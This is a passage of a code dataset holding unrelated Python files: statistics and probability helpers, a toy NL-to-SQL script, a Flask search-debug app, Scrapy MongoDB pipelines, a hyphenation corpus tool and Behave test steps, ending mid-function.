text stringlengths 38 1.54M |
|---|
def bootstrap(returns, statistic_fn, size, num_samples):
    """Draw bootstrap samples from a return series and evaluate a statistic.

    :param returns: pandas Series of returns to sample from (NaNs are dropped)
    :param statistic_fn: function taking a single Series and returning a scalar
    :param size: number of observations in each bootstrap sample
    :param num_samples: number of bootstrap samples to draw
    :return: list of ``num_samples`` statistics, one per bootstrap sample

    Fix: the original docstring mislabelled the parameters (e.g. ``:returns:``
    used for the ``returns`` argument); NaN filtering now uses the idiomatic
    ``dropna()`` (equivalent to ``returns[~returns.isna()]``).
    """
    clean = returns.dropna()
    return [
        statistic_fn(clean.sample(size, replace=True))
        for _ in range(num_samples)
    ]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 15 22:51:07 2017
@author: HP 15 AB032TX
"""
# --- Toy natural-language -> pseudo-SQL question translator (Python 2 script) ---
# Keyword tables used to classify the tokens of the user's question.
Questions=['what','who','where','how','when','whom','why']
Table=[]  # table names implied by the question; filled in by the has* helpers
Q=raw_input().split()  # the question, tokenised on whitespace (Python 2 input)
G={}  # canonical concept name -> list of synonyms
G['faculty']=['faculty','teacher','tutor']
G['attendance']=['presence','turnout','attendance','debarred']
G['subject']=['network','dsa']
G['building']=['sjt','tt','gdn','mb','smv','cdmm']
G['hostel']=['block','hostel']
Extras=['best','worst','top 5','top 3','top 10']  # superlative qualifiers
Subjects=[]  # subject tokens found while generalising the question
Hostel=['a','b','m','d','e','f','g','h','j','p','n','l','k']  # hostel letters
def generalise(Q):
    """Canonicalise the tokens of Q in place using the synonym table G.

    Any token recognised as a subject is appended to the module-level
    ``Subjects`` list before being replaced by its concept name.
    """
    for idx in range(len(Q)):
        for concept in G:
            if Q[idx] in G[concept]:
                if concept == 'subject':
                    Subjects.append(Q[idx])
                Q[idx] = concept
def hasHostel(Q):
    """Return the hostel letter mentioned in Q, or the sentinel 'nothing'.

    NOTE(review): ``out`` is initialised to True, so the first loop only
    serves to record 'hostel' in ``Table``; the final ``return False`` is
    unreachable. Callers test ``len(hasHostel(Q)) != 7`` against the
    7-character sentinel 'nothing', so that string must not be changed.
    """
    out=True
    for word in Q:
        if word=='hostel':
            out=True
            Table.append('hostel')
            break
    if out:
        for word in Q:
            if word in Hostel:
                return word
        return 'nothing'
    return False
def hasQuestion(Q):
    """Return the first question word ('what', 'who', ...) found in Q,
    or False if the question contains none.

    Fix: removed the unreachable ``return Subjects`` that followed the
    final ``return False`` in the original.
    """
    for token in Q:
        if token in Questions:
            return token
    return False
def hasattendance(Q):
    """Report whether Q mentions an attendance synonym; if so, record the
    'attendance' table in the module-level ``Table`` list."""
    found = any(token in G['attendance'] for token in Q)
    if found:
        Table.append('attendance')
    return found
def hasFaculty(Q):
    """Report whether Q mentions a faculty synonym; if so, record the
    'faculty' table in the module-level ``Table`` list."""
    found = any(token in G['faculty'] for token in Q)
    if found:
        Table.append('faculty')
    return found
def extraKeys(Q):
    """Return the first superlative qualifier found in Q, else ''.

    NOTE(review): multi-word entries in Extras ('top 5', 'top 3', 'top 10')
    can never equal a single whitespace-split token — confirm intent.
    """
    for token in Q:
        if token in Extras:
            return token
    return ''
# Build a human-readable query (``query``) and a pseudo-SQL query (``fQuery``)
# from the generalised question.
query=['Show ']
fQuery=['SELECT ']
generalise(Q)
Asked=0  # how many distinct things the question asks about
if hasattendance(Q):
    query.append('attendance of')
    fQuery.append('attendance')
    Asked+=1
if hasFaculty(Q):
    query.append(extraKeys(Q))
    query.append('faculty of')
    fQuery.append('faculty')
    Asked+=1
# hasHostel returns a hostel letter or the 7-char sentinel 'nothing'.
if len(hasHostel(Q))!=7:
    fQuery.append('hostel')
    query.append('hostel ')
    query.append(hasHostel(Q))
fQuery.append('FROM')
Table=list(set(Table))  # de-duplicate table names recorded by the helpers
fQuery+=Table
if hasFaculty(Q) or hasattendance(Q):
    fQuery.append('WHERE SUBJECT =')
    fQuery+=Subjects
elif len(hasHostel(Q))!=7:
    fQuery.append('WHERE HOSTEL =')
    # NOTE(review): += on a string extends fQuery character by character;
    # append() was probably intended — confirm expected output.
    fQuery+=hasHostel(Q)
query.append(' and '.join(Subjects))
if Asked>1:
    print 'Ask One thing at a time'
else:
    print ' '.join(query)
    print ' '.join(fQuery)
|
# pylint: disable=wrong-import-order
from __future__ import absolute_import, division, print_function, unicode_literals
from gevent.wsgi import WSGIServer
from flask import Flask, request, render_template
import os
import sys
import json
import requests
sys.path.insert(0, os.getcwd())
from cosrlib.document import load_document_type
from cosrlib.config import config
from cosrlib.searcher import Searcher
from cosrlib.indexer import Indexer
# Resolve static/template paths relative to this file so the app can be
# launched from any working directory.
CURRENT_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
app = Flask(
    "explainer",
    static_folder=os.path.join(CURRENT_DIRECTORY, "static"),
    template_folder=os.path.join(CURRENT_DIRECTORY, "templates")
)
# Module-level singletons shared by all request handlers.
indexer = Indexer()
indexer.connect()
searcher = Searcher()
searcher.connect()
@app.route('/')
def route_search():
    """ Homepage, for debugging searches. Renders the search UI template. """
    return render_template("search.html", config={})
@app.route('/url')
def route_url():
    """ URL page, for debugging parsing. Renders the URL-debug UI template. """
    return render_template("url.html", config={})
@app.route('/api/searchdebug')
def debug_search():
    """ API route for search debug: runs the query with explanations and
    fetched documents, and returns the raw results as JSON. """
    query = request.args.get("q")
    # NOTE(review): the language is read from query param "g" — looks like
    # it may be intended as "lang"; confirm against the client code.
    lang = request.args.get("g") or "en"
    results = searcher.search(query, lang=lang, explain=True, fetch_docs=True)
    return json.dumps(results)
@app.route('/api/urldebug')
def debug_url():
    """ API route for URL debug: fetches (or reads locally) the given URL,
    parses it and returns the parsed fields, links and ranking signals as
    JSON. """
    # TODO: have a quota per ip on this API to prevent abuse
    url = request.args.get("url")
    # Special case for local files (only allowed in the local environment).
    if url.startswith("tests/") and config["ENV"] == "local":
        with open(url, "rb") as f:
            cnt = f.read()
        headers = {}
    else:
        # Default to plain http when no scheme was supplied.
        if not url.startswith("http"):
            url = "http://" + url
        req = requests.get(url)
        cnt = req.content
        headers = dict(req.headers)
    doc = load_document_type("html", cnt, url=str(url), headers=headers)
    parsed = indexer.parse_document(doc)
    global_rank, ranking_signals = indexer.ranker.get_global_document_rank(doc, parsed["url_metadata"])
    # URL class is not serializable, so links are flattened to plain dicts.
    links = [{
        "href": link["href"].url,
        "words": link.get("words")
    } for link in doc.get_hyperlinks()]
    ret = {
        "url": parsed["url"].url,
        "word_groups": doc.get_word_groups(),
        "rank": global_rank,
        "title_raw": doc.get_title(),
        "title": parsed["title_formatted"],
        "summary": parsed["summary_formatted"],
        "langs": parsed["langs"],
        "links": links,
        "ranking_signals": ranking_signals
    }
    return json.dumps(ret)
def main():
    """Start the explainer app on the host:port given by config["EXPLAINER"]."""
    if config["ENV"] == "local":
        app.debug = True
    print("Explainer listening on http://%s" % config["EXPLAINER"])
    sys.stdout.flush()
    # NOTE(review): gevent.wsgi was renamed gevent.pywsgi in newer gevent
    # releases — confirm the pinned gevent version before upgrading.
    http_server = WSGIServer((config["EXPLAINER"].split(":")[0], int(config["EXPLAINER"].split(":")[1])), app)
    http_server.serve_forever()

if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymongo
import urllib
import logging
import hashlib
from scrapy.exceptions import DropItem
from eastmoney.BloomFilter import BloomFilter
from scrapy.utils.request import request_fingerprint
from scrapy.utils.python import to_bytes
from w3lib.url import canonicalize_url
logger = logging.getLogger('GuBa_Post')
class EastmoneyPipeline(object):
    """No-op pipeline: passes every item through unchanged."""

    def process_item(self, item, spider):
        """Return the item untouched."""
        return item
class MongoPipeline(object):
    """Store scraped posts into the MongoDB 'gubapost' collection."""

    def __init__(self,mongo_uri,mongo_db,username,password):
        self.mongo_uri = mongo_uri
        self.mongo_db = mongo_db
        self.username = username
        self.password = password
        self.collection_name = 'gubapost'
    @classmethod
    def from_crawler(cls,crawler):
        """Build the pipeline from crawler settings; credentials are
        percent-encoded as required by MongoDB connection strings."""
        return cls(
            mongo_uri = crawler.settings.get('MONGO_URI'),
            mongo_db = crawler.settings.get('MONGO_DATABASE'),
            username = urllib.quote_plus(crawler.settings.get('MONGO_USER')),
            password = urllib.quote_plus(crawler.settings.get('MONGO_PWD'))
        )
    def open_spider(self,spider):
        """Open the MongoDB connection when the spider starts."""
        try:
            self.client = pymongo.MongoClient(
                self.mongo_uri,
                username = self.username,
                password = self.password
            )
            self.db = self.client[self.mongo_db]
        except Exception as err:
            # NOTE(review): connection errors are only printed, so the
            # spider continues and fails later on self.db — consider
            # re-raising or using logger.error.
            print(str(err))
    def close_spider(self,spider):
        """Close the MongoDB connection when the spider finishes."""
        self.client.close()
    def process_item(self,item,spider):
        """Write one post to MongoDB; drop items without content.

        Fixes: DropItem takes a single message string (the original passed
        the url as a stray second positional argument); the always-true
        ``valid`` flag was dead code and is removed.
        """
        if not item['content']:
            raise DropItem('missing content of post on %s' % item['url'])
        post = [{
            'url':item['url'],
            'title':item['title'],
            'date':item['date'],
            'content':item['content']
        }]
        # NOTE(review): Collection.insert is deprecated in pymongo 3 in
        # favour of insert_one/insert_many — confirm the pymongo version.
        self.db[self.collection_name].insert(post)
        logger.info('Item wrote into MongoDB database %s/%s'%
                    (self.mongo_db,self.collection_name))
        return item
# Use a Bloom filter to deduplicate items (instead of URL-based dedup),
# so incremental crawls can skip posts that are already stored.
class DupeFilterPipeline(object):
    """Drop already-seen items using a Redis-backed Bloom filter, so
    incremental crawls skip posts that were stored on a previous run."""

    def __init__(self,redis_host,redis_port,filter_db,filter_key):
        self.redis_host = redis_host
        self.redis_port = redis_port
        self.filter_db = filter_db
        self.filter_key = filter_key
        self.bf = BloomFilter(redis_host,redis_port,filter_db,blockNum=1,key=filter_key)
    @classmethod
    def from_crawler(cls,crawler):
        """Build the pipeline from the crawler's Redis settings."""
        return cls(
            redis_host=crawler.settings.get('REDIS_HOST'),
            redis_port=crawler.settings.get('REDIS_PORT'),
            filter_db=crawler.settings.get('FILTER_DB'),
            filter_key=crawler.settings.get('FILTER_KEY')
        )
    def item_seen(self,item):
        """Return True if the item's fingerprint is already in the filter;
        otherwise record the fingerprint and return False.

        The fingerprint is a SHA1 over content, author and canonical URL.
        """
        fp = hashlib.sha1()
        fp.update(to_bytes(item['content']))
        fp.update(to_bytes(item['author']))
        fp.update(to_bytes(canonicalize_url(item['url'])))
        digest = fp.hexdigest()
        if self.bf.isContains(digest):
            return True
        self.bf.insert(digest)
        return False
    def process_item(self,item,spider=None):
        """Drop the item if it was seen before, otherwise pass it on.

        Fixes: the original called the bare name ``item_seen`` (NameError at
        runtime — it is a method, so ``self.item_seen``), omitted the
        ``spider`` argument Scrapy passes to pipelines (added with a default
        for backward compatibility), and passed a stray second positional
        argument to DropItem.
        """
        if self.item_seen(item):
            raise DropItem('already parsed content dropped %s' % item['content'])
        return item
|
class MapCfg:
    """Field-layout entry: a field name plus its width in bytes."""

    def __init__(self, field, bytes):
        # ``bytes`` shadows the builtin, but the name is kept for
        # interface compatibility with existing callers.
        self.field = field
        self.bytes = bytes
class Test:
    """Demo record parser: a 20-char string is split into head (6 chars),
    buf (8 chars) and tail (6 chars); buf is then decoded either with a
    fixed layout (parse) or a caller-supplied MapCfg layout (prs)."""

    def __init__(self, len, buf):
        # NOTE(review): parameter ``len`` shadows the builtin of the same name.
        print('コンストラクタが呼ばれました')
        print(buf)
        self.len=len
        self.head=buf[:6]
        self.buf=buf[6:14]
        self.tail=buf[14:]
        self.dt=()   # fields decoded by parse()
        self.dt2=()  # fields decoded by prs()
        self.parse()
    def __del__(self):
        print('デストラクタが呼ばれました')
    def prt(self):
        # Dump the parsed pieces for inspection.
        print('head:'+self.head)
        print('dt1:', self.dt)
        print('dt2:', self.dt2)
        print('tail:'+self.tail)
    def parse(self):
        # Fixed layout: 2 + 2 + 2 + 2 characters of buf.
        self.dt+= (self.buf[:2],)
        self.dt+= (self.buf[2:4],)
        self.dt+= (self.buf[4:6],)
        self.dt+= (self.buf[6:],)
    def prs(self,map):
        # Variable layout: consume ``m.bytes`` characters per MapCfg entry.
        # NOTE(review): parameter ``map`` shadows the builtin.
        tbuf=self.buf
        for m in map:
            #print(tbuf)
            self.dt2+= (tbuf[:m.bytes],)
            tbuf=tbuf[m.bytes:]
# Demo: layout of two 1-byte fields, a 2-byte field and a 4-byte field
# (8 characters total, matching Test.buf).
# NOTE(review): the name ``map`` shadows the builtin.
map=(MapCfg('u1_dt1',1),MapCfg('u1_dt2',1),MapCfg('u2_dt3',2),MapCfg('u4_dt4',4))
test=Test(10,'01023154876045723590')
test.prt()
test.prs(map)
test.prt()
## Hyphen RULEBUILDER
import codecs
import os
print('Begin')
TabChar = '\t'  # MainDictionary columns are tab-separated
# NOTE(review): Punctuation is defined but the visible stripping logic uses
# isalnum() instead — confirm whether this set is still needed.
Punctuation = {".", "?", "!", ":", ";", '"', "'", ",", "—", "$", "£",
               '″', "′", '”', "´", '*', '(', ')', '¢', '_', '[', ']'}
def strip_punctuation(Token):
    """Strip non-alphanumeric characters from both ends of a word.

    Returns "" when the token contains no alphanumeric character at all.

    Bug fix: the original trimmed the front of the token first and then
    sliced with an index computed on the *untrimmed* character list, so a
    token with punctuation at both ends (e.g. "..ab.") kept its trailing
    punctuation; its reverse scan also never examined index 0, so "a.."
    was returned unchanged.
    """
    TokLis = list(Token)
    First = None
    for Index, Char in enumerate(TokLis):
        if Char.isalnum():
            First = Index
            break
    if First is None:
        return ""
    # Scan backwards over the full range, including index 0.
    for Last in range(len(TokLis) - 1, -1, -1):
        if TokLis[Last].isalnum():
            break
    return Token[First:Last + 1]
## Open the MainDictionary, read it into Lexicon.
print('Loading dictionary.')
FileString = '/Users/tunderwood/Spellcheck/Rules/MainDictionary.txt'
F = codecs.open(FileString, 'r', 'utf-8')
FileLines = F.readlines()
F.close()
Lexicon = set()
for Line in FileLines:
    Line = Line.rstrip()
    LineParts = Line.split(TabChar)
    # Only the first (word) column matters; the rest of the row is ignored.
    Word = LineParts[0].rstrip()
    Lexicon.add(Word)
Lexicon = frozenset(Lexicon)
del FileLines
OutPath = "/Users/tunderwood/Rules/HyphenRules/"
InPath = "/Users/tunderwood/Rules/FileSources/"
DirList = os.listdir(InPath)
SyncoFreq = {}  # syncopated ('d) word -> frequency
SyncoCorr = {}  # syncopated word -> proposed expansion or "n/a"
HyphFreq = {}   # hyphenated word -> frequency
Count = 0
DocLen = len(DirList)
# Progress markers at every tenth of the corpus.
# NOTE(review): if fewer than 10 files are present Tenth is 0 and range()
# below raises ValueError (step 0) — confirm the corpus is always larger.
Tenth = int(DocLen/10)
Tenths = frozenset(range(Tenth, DocLen+Tenth, Tenth))
TenthCount = 10
# First pass: collect syncopate and hyphenation frequencies per file.
for FileName in DirList:
    if FileName[0] == '.' or FileName[-1] != 't':
        print('Skipping hidden file', FileName)
        continue
    Count += 1
    if Count in Tenths:
        print(TenthCount,'%', sep='')
        TenthCount += 10
    FileString = InPath + FileName
    F = codecs.open(FileString, 'r', 'utf-8')
    Document = F.readlines()
    F.close()
    DVector = []
    for Line in Document:
        Line = Line.rstrip()
        if Line == '' or Line.isdigit():
            continue
        ## Split each line into words after replacing certain problematic substrings.
        Line = Line.replace('äî', ' ')
        Line = Line.replace('Äî', ' ')
        Line = Line.replace('ñ™', ' ')
        Line = Line.replace(chr(8218), ' ')
        Line = Line.replace(chr(8212), ' ')
        Line = Line.replace(".", " ")
        Line = Line.replace(",", " ")
        Line = Line.replace("--", " ")
        Line = Line.replace("_", " ")
        Line = Line.replace('▪', ' ')
        Line = Line.replace(';', ' ')
        Line = Line.replace('"', ' ')
        Line = Line.replace('[', ' ')
        Line = Line.replace(']', ' ')
        Line = Line.replace('!', ' ')
        Line = Line.replace('?', ' ')
        Line = Line.replace('&', ' ')
        Line = Line.replace(':', ' ')
        Line = Line.replace('|', '')
        Line = Line.replace(chr(8739), '')
        Line = Line.replace('{', '')
        Line = Line.replace('}', '')
        Line = Line.replace('′', "'")
        Line = Line.replace('´', "'")
        WordList = Line.split()
        # Extend the doc vector by adding these words.
        DVector.extend(WordList)
    for Index, Word in enumerate(DVector):
        Word = Word.lower()
        Word = strip_punctuation(Word)
        if len(Word) < 2:
            continue
        # Drop possessive 's before testing for a syncopated 'd ending.
        if Word[-2:] == "'s":
            Word = Word[:-2]
        if Word[-2:] == "'d":
            # Candidate expansions: drop'd -> dropped-style ("ed") or
            # carri'd -> carried-style ("ied").
            ThreeWord = Word[:-3] + "ied"
            TwoWord = Word[:-2] + "ed"
            if TwoWord in Lexicon:
                CorrectWord = TwoWord
            elif ThreeWord in Lexicon:
                CorrectWord = ThreeWord
            else:
                CorrectWord = "n/a"
            if Word in SyncoCorr:
                SyncoFreq[Word] += 1
            else:
                SyncoCorr[Word] = CorrectWord
                SyncoFreq[Word] = 1
        if "-" in Word:
            if Word in HyphFreq:
                HyphFreq[Word] += 1
            else:
                HyphFreq[Word] = 1
print('Done initial read.')
# Export syncopates, most frequent first.
WriteList = []
for Word, Freq in SyncoFreq.items():
    Line = Word + '\t' + SyncoCorr[Word] + '\t' + str(Freq) + '\n'
    WTuple = (Freq, Line)
    WriteList.append(WTuple)
WriteList = sorted(WriteList, key = lambda Pair: Pair[0], reverse = True)
FileString = OutPath + 'Syncopates.txt'
F = codecs.open(FileString, 'w', 'utf-8')
for WTuple in WriteList:
    Freq, Line = WTuple
    F.write(Line)
F.close()
del WriteList
del SyncoFreq
del SyncoCorr
# Export hyphenated-word frequencies, most frequent first.
WriteList = []
for Word, Freq in HyphFreq.items():
    Line = (Word, Freq)
    WriteList.append(Line)
WriteList = sorted(WriteList, key = lambda Pair: Pair[1], reverse = True)
FileString = OutPath + 'HyphFreq.txt'
F = codecs.open(FileString, 'w', 'utf-8')
for WTuple in WriteList:
    Word, Freq = WTuple
    Line = Word + '\t' + str(Freq) + '\n'
    F.write(Line)
F.close()
del WriteList
print('Exported HyphFreq.')
# Generate a dictionary containing all first elements in the list of hyphenated terms,
# another dictionary containing tuples of the separate elements,
# and a third containing the elements fused as a word.
FirstParts = {}
TupleFreq = {}
FusedFreq = {}
for Word, Freq in HyphFreq.items():
    First, Sep, Second = Word.partition("-")
    if First in FirstParts:
        FirstParts[First] += 1
    elif Second != "" and First.isalnum():
        FirstParts[First] = 1
    ## There are some hidden consequences of that elif, because we only check tuple
    ## versions in cases where the first element is in FirstParts.
    if Freq < 5:
        continue
    # Register the split ("first second") and fused ("firstsecond") variants.
    Unhyphed = Word.replace('-', ' ')
    WordTuple = tuple(Unhyphed.split())
    TupleFreq[WordTuple] = 0
    Fused = Word.replace('-', '')
    FusedFreq[Fused] = 0
## Count the fused and tuple versions.
Count = 0
Total = 0
# Second pass over the corpus: count fused words and split-word n-grams.
for FileName in DirList:
    if FileName[0] == '.' or FileName[0] == 'K' or FileName[-1] != 't':
        continue
    print(FileName)
    FileString = InPath + FileName
    F = codecs.open(FileString, 'r', 'utf-8')
    Document = F.readlines()
    F.close()
    DVector = []
    for Line in Document:
        Line = Line.rstrip()
        if Line == '' or Line.isdigit():
            continue
        ## Split each line into words after replacing certain problematic substrings.
        Line = Line.replace('äî', ' ')
        Line = Line.replace('Äî', ' ')
        Line = Line.replace('ñ™', ' ')
        Line = Line.replace(chr(8218), ' ')
        Line = Line.replace(chr(8212), ' ')
        Line = Line.replace(".", " ")
        Line = Line.replace(",", " ")
        Line = Line.replace("--", " ")
        Line = Line.replace("_", " ")
        Line = Line.replace('▪', ' ')
        Line = Line.replace(';', ' ')
        Line = Line.replace('"', ' ')
        Line = Line.replace('[', ' ')
        Line = Line.replace(']', ' ')
        Line = Line.replace('!', ' ')
        Line = Line.replace('?', ' ')
        Line = Line.replace('&', ' ')
        Line = Line.replace(':', ' ')
        Line = Line.replace('|', '')
        Line = Line.replace(chr(8739), '')
        Line = Line.replace('{', '')
        Line = Line.replace('}', '')
        Line = Line.replace('′', "'")
        Line = Line.replace('´', "'")
        WordList = Line.split()
        # Extend the doc vector by adding these words.
        DVector.extend(WordList)
    Total += len(DVector)
    Count += 1
    for Index, Word in enumerate(DVector):
        Word = Word.lower()
        Word = strip_punctuation(Word)
        if len(Word) < 1:
            continue
        if Word in FusedFreq:
            FusedFreq[Word] += 1
        # Only check bigram/trigram variants when the first part is known.
        if Word not in FirstParts:
            continue
        TwoWord = tuple(DVector[Index: Index+2])
        if TwoWord in TupleFreq:
            TupleFreq[TwoWord] += 1
            continue
        ThreeWord = tuple(DVector[Index: Index+3])
        if ThreeWord in TupleFreq:
            TupleFreq[ThreeWord] += 1
# Write the frequencies of hyphenated, fused, and split versions.
Average = int(Total/Count)
print('Average word length', Average)
WriteList = []
for Word, Freq in HyphFreq.items():
    Unhyphed = Word.replace('-', ' ')
    WordTuple = tuple(Unhyphed.split())
    Fused = Word.replace('-', '')
    # Fused/split counts are scaled x10 before comparison with the
    # hyphenated frequency.
    Fuse = FusedFreq.get(Fused, 0) * 10
    Tup = TupleFreq.get(WordTuple, 0) * 10
    # Does the word mostly occur hyphenated, fused, split, or is it ambiguous?
    if Freq > Fuse and Freq > Tup:
        Most = "H"
    elif Fuse > Freq and Fuse > Tup:
        Most = "F"
    elif Tup > Freq and Tup > Fuse:
        Most = "S"
    else:
        Most = "A"
    # Dictionary words always win: mark as "D" regardless of counts.
    if Fused in Lexicon:
        Most = "D"
    Line = Word + '\t' + str(Freq) + '\t' + str(Fuse) + '\t' + str(Tup) + '\t' + Most + '\n'
    WTuple = Most, Freq, Line
    WriteList.append(WTuple)
# Sort by frequency, then stably by category letter.
WriteList = sorted(WriteList, key = lambda Element: Element[1], reverse = True)
WriteList = sorted(WriteList, key = lambda Element: Element[0])
FileString = OutPath + 'Hyphenates.txt'
F = codecs.open(FileString, 'w', 'utf-8')
for WTuple in WriteList:
    Most, Freq, Line = WTuple
    F.write(Line)
F.close()
del WriteList
|
# -*- encoding: utf-8 -*-
# No real algorithm here — we just need a reverse lookup (find a dict key by its value).
class Solution:
    def isIsomorphic(self, s: str, t: str) -> bool:
        """Return True when s and t are isomorphic: a one-to-one character
        mapping turns s into t (e.g. "egg"/"add" yes, "foo"/"bar" no)."""
        if len(s) != len(t):
            return False
        mapping = {}
        for cs, ct in zip(s, t):
            if cs in mapping:
                # Existing mapping must stay consistent.
                if mapping[cs] != ct:
                    return False
            elif ct in mapping.values():
                # ct already targeted by another source char: not injective.
                return False
            mapping[cs] = ct
        return True
#-*- coding:utf-8 -*-
import json
import types
from behave import *
from test import bdd_util
from features.testenv.model_factory import *
from django.test.client import Client
from django.contrib.auth.models import User
from mall.models import ProductLimitZoneTemplate
from tools.regional.models import City, Province
@then(u"{user}能获得限定区域列表")
def step_impl(context, user):
    """Fetch the limit-zone template list page and compare the rendered
    templates against the expected JSON given in the scenario text."""
    url = '/mall2/product_limit_zone/'
    response = context.client.get(url)
    templates = response.context['templates']
    expected = json.loads(context.text)
    actual = []
    for template in templates:
        template_data = {}
        template_data['name'] = template['templateName']
        limit_area = []
        for zone in template['zones']:
            zone_data = {}
            # Special zone names keep their provinces grouped in one entry;
            # ordinary zones emit one entry per province with its cities.
            if zone['zoneName'] in [u'直辖市', u'其它']:
                zone_data['area'] = zone['zoneName']
                province_list = []
                for province in zone['provinces']:
                    province_list.append(province['provinceName'])
                zone_data['province'] = province_list
                limit_area.append(zone_data)
            else:
                for province in zone['provinces']:
                    zone_data = {}
                    zone_data['area'] = province['zoneName']
                    zone_data['province'] = province['provinceName']
                    zone_data['city'] = []
                    for city in province['cities']:
                        zone_data['city'].append(city['cityName'])
                    limit_area.append(zone_data)
        template_data['limit_area'] = limit_area
        template_data["actions"] = [u"修改", u"删除"]
        actual.append(template_data)
    bdd_util.assert_list(expected, actual)
@when(u"{user}添加限定区域配置")
def step_impl(context, user):
    """Create a limit-zone template from the scenario's JSON payload and
    POST it to the template API."""
    data = json.loads(context.text)
    url = '/mall2/api/product_limit_zone_template/?_method=put'
    template_name = data['name']
    provinces = []
    cities = []
    for limit_area in data['limit_area']:
        # 'province' may be a single name (unicode) or a list of names.
        if type(limit_area['province']) is types.UnicodeType:
            provinces.append(limit_area['province'])
        if type(limit_area['province']) is types.ListType:
            provinces += limit_area['province']
        # Idiom fix: dict.has_key() is deprecated (removed in Python 3);
        # the `in` operator is equivalent and works on both.
        if 'city' in limit_area:
            cities += limit_area['city']
    province_ids = []
    for province in provinces:
        province_ids.append(str(Province.objects.filter(name__contains=province).first().id))
    city_ids = City.objects.filter(name__in=cities).values_list('id', flat=True)
    args = {
        'template_name': template_name,
        'province_ids': json.dumps(province_ids),
        'city_ids': json.dumps([str(id) for id in city_ids])
    }
    response = context.client.post(url, args)
    bdd_util.assert_api_call_success(response)
@when(u"{user}修改'{template_name}'限定区域配置")
def step_impl(context, user, template_name):
    """Modify the named limit-zone template with the scenario's JSON payload."""
    # NOTE(review): filter() returns a QuerySet, not a User instance —
    # the owner=user lookup below probably wants .first(); confirm against
    # the model before changing.
    user = User.objects.filter(username=user)
    template_id = ProductLimitZoneTemplate.objects.filter(owner=user, name=template_name).first().id
    data = json.loads(context.text)
    url = '/mall2/api/product_limit_zone_template/'
    template_name = data['name']
    provinces = []
    cities = []
    for limit_area in data['limit_area']:
        # 'province' may be a single name (unicode) or a list of names.
        if type(limit_area['province']) is types.UnicodeType:
            provinces.append(limit_area['province'])
        if type(limit_area['province']) is types.ListType:
            provinces += limit_area['province']
        # Idiom fix: dict.has_key() is deprecated (removed in Python 3);
        # the `in` operator is equivalent and works on both.
        if 'city' in limit_area:
            cities += limit_area['city']
    province_ids = []
    for province in provinces:
        province_ids.append(str(Province.objects.filter(name__contains=province).first().id))
    city_ids = City.objects.filter(name__in=cities).values_list('id', flat=True)
    args = {
        'template_id': template_id,
        'template_name': template_name,
        'province_ids': json.dumps(province_ids),
        'city_ids': json.dumps([str(id) for id in city_ids])
    }
    response = context.client.post(url, args)
    bdd_util.assert_api_call_success(response)
@when(u"{user}删除'{template_name}'限定区域配置")
def step_impl(context, user, template_name):
    """Delete the named limit-zone template through the API."""
    # NOTE(review): filter() returns a QuerySet, not a single User —
    # owner=user below likely needs .first(); confirm against the model.
    user = User.objects.filter(username=user)
    template_id = ProductLimitZoneTemplate.objects.filter(owner=user, name=template_name).first().id
    url = "/mall2/api/product_limit_zone/?_method=delete"
    response = context.client.post(url, {'template_id': template_id})
    bdd_util.assert_api_call_success(response)
from unittest.case import TestCase
from pandas import DataFrame
from probability.calculations.bayes_rule import MultipleBayesRule
from probability.discrete.discrete import Discrete
class TestChapter01(TestCase):
    """Bayes-rule examples over the cookie-bowl and M&M mixes, checked both
    by direct arithmetic and through MultipleBayesRule."""

    def setUp(self) -> None:
        # cookies: expected joint probabilities of (bowl, flavor).
        self.bowl_1_and_chocolate = 0.125
        self.bowl_1_and_vanilla = 0.375
        self.bowl_2_and_chocolate = 0.25
        self.bowl_2_and_vanilla = 0.25
        cookie_data = TestChapter01.make_cookies_observations()
        self.cookies = Discrete.from_observations(cookie_data)
        # Marginal and conditional probabilities used across tests.
        self.vanilla = self.cookies.p(flavor='vanilla')
        self.vanilla__bowl_1 = self.cookies.given(
            bowl='bowl 1').p(flavor='vanilla')
        self.vanilla__bowl_2 = self.cookies.given(
            bowl='bowl 2').p(flavor='vanilla')
        # Uniform prior over the two bowls.
        self.bowl = Discrete.from_probs({
            'bowl 1': 0.5, 'bowl 2': 0.5},
            variables=['bowl']
        )
        self.bowl_1 = self.bowl.p(bowl='bowl 1')
        self.bowl_2 = self.bowl.p(bowl='bowl 2')
        # m & m's: color mixes for the 1994 and 1996 bags.
        self.mix_1994 = Discrete.from_probs({
            'brown': 0.3, 'yellow': 0.2, 'red': 0.2,
            'green': 0.1, 'orange': 0.1, 'tan': 0.1
        }, variables='color')
        self.mix_1996 = Discrete.from_probs({
            'blue': 0.24, 'green': 0.2, 'orange': 0.16,
            'yellow': 0.14, 'red': 0.13, 'brown': 0.13
        }, variables='color')
        self.bag = Discrete.from_probs({1994: 0.5, 1996: 0.5}, variables='bag')

    @staticmethod
    def make_cookies_observations() -> DataFrame:
        """Build 80 cookie observations matching the joint probabilities
        asserted in test__01_03 (30/10 and 20/20 vanilla/chocolate)."""
        return DataFrame({
            'bowl': ['bowl 1'] * 40 + ['bowl 2'] * 40,
            'flavor': (
                ['vanilla'] * 30 + ['chocolate'] * 10 +
                ['vanilla'] * 20 + ['chocolate'] * 20
            )
        })

    def test__01_03(self):
        # Joint distribution matches the hand-computed probabilities.
        data = self.cookies.data
        self.assertEqual(data.loc[('bowl 1', 'chocolate')],
                         self.bowl_1_and_chocolate)
        self.assertEqual(data.loc[('bowl 1', 'vanilla')],
                         self.bowl_1_and_vanilla)
        self.assertEqual(data.loc[('bowl 2', 'chocolate')],
                         self.bowl_2_and_chocolate)
        self.assertEqual(data.loc[('bowl 2', 'vanilla')],
                         self.bowl_2_and_vanilla)

    def test__01_04(self):
        # Bayes' rule by hand vs the conditional from the distribution.
        self.assertEqual(self.bowl_1, 0.5)
        self.assertEqual(self.vanilla__bowl_1, 0.75)
        self.assertEqual(0.625, self.vanilla)
        bowl_1__vanilla = self.bowl_1 * self.vanilla__bowl_1 / self.vanilla
        self.assertEqual(0.6, bowl_1__vanilla)
        self.assertEqual(
            0.6, self.cookies.given(flavor='vanilla').p(bowl='bowl 1')
        )

    def test__01_05(self):
        # Law of total probability reproduces the vanilla marginal.
        self.assertEqual(self.bowl_2, 0.5)
        vanilla__bowl_2 = self.cookies.given(
            bowl='bowl 2').p(flavor='vanilla')
        self.assertEqual(0.5, vanilla__bowl_2)
        vanilla = (
